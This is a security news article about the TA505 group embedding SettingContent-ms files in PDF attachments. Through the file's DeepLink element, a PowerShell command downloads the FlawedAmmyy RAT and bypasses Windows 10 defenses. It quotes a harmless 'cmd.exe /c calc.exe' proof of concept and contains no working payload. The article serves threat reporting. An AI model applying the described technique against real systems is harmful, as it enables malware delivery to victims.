TA505 gang abusing PDF files embedding SettingContent-ms to distribute FlawedAmmyy RAT

The SettingContent-ms file format was implemented in Windows 10 to allows a user to create “shortcuts” to various Windows 10 setting pages.

Thi file opens the Control Panel for the user [control.exe], experts noticed that it includes the  <DeepLink> element in the schema.

This element takes any binary with parameters and executes it, this means that an attacker can substitute ‘control.exe’ with a malicious script that could execute any command, including cmd.exe and PowerShell, without user interaction.

“After countless hours reading file specifications, I stumbled across the “.SettingContent-ms” file type. This format was introduced in Windows 10 and allows a user to create “shortcuts” to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.” wrote experts from Specterops.

“The interesting aspect of this file is the <DeepLink> element in the schema. This element takes any binary with parameters and executes it. What happens if we simply substitute “control.exe” to something like “cmd.exe /c calc.exe”?”

Experts noticed that maliciously SettingContent-ms file can bypass Windows 10 security mechanisms such as Attack Surface Reduction (ASR) and detection of OLE-embedded dangerous file formats.

In June experts from SpecterOps monitored several campaigns abusing the SettingContent-ms file format within Microsoft Word documents, but only a few days ago Proofpoint experts noticed threat actors leveraging PDF documents.

“Colleagues at SpecterOps recently published research[1] on abuse of the SettingContent-ms file format. Crafted SettingContent-ms files can be used to bypass certain Windows 10 defenses such as Attack Surface Reduction (ASR) and detection of OLE-embedded dangerous file formats.” reads the analysis published by Proofpoint.

“We first observed an actor embedding SettingContent-ms inside a PDF on June 18. However, on July 16 we observed a particularly large campaign with hundreds of thousands of messages attempting to deliver PDF attachments with an embedded SettingContent-ms file.”

Once the victim has opened the PDF file, Adobe Reader will display a warning message asking the user if they want to open the file, since it is attempting to run the embedded “downl.SettingContent-ms” via JavaScript. Experts noticed that the warning message is displayed for any file format embedded within a PDF, not only for SettingContent-ms files.

If the victim clicks the “OK” prompt, the PowerShell command included in the <DeepLink> element downloads and execute the FlawedAmmyy RAT.

The FlawedAmmyy RAT has been active since 2016, it borrows the code of the Ammyy Admin remote access Trojan.

FlawedAMMYY implements common backdoor features, it allows attackers to manage files, capture the screen, remote control the machine, establish RDP SessionsService, and much more.

Experts attributed the malspam campaign to the TA505  threat actor based on email messages, as well as the payload.

The TA505 operates on a large scale, it was behind other major campaigns leveraging the Necurs botnet to deliver other malware, including the Locky ransomware, the Jaff ransomware, and the Dridex banking Trojan.

“Whether well established (like TA505) or newer to the space, attackers are quick to adopt new techniques and approaches when malware authors and researchers publish new proofs of concept. While not all new approaches gain traction, some may become regular elements through which threat actors rotate as they seek new means of distributing malware or stealing credentials for financial gain.” concludes Proofpoint researchers, “In this case, we see TA505 acting as an early adopter, adapting the abuse of SettingContent-ms files to a PDF-based attack delivered at significant scale.”

[adrotate banner=”9″]

[adrotate banner=”12″]

Pierluigi Paganini

(Security Affairs – TA505 ,  SettingContent-ms file)

[adrotate banner=”5″]

[adrotate banner=”13″]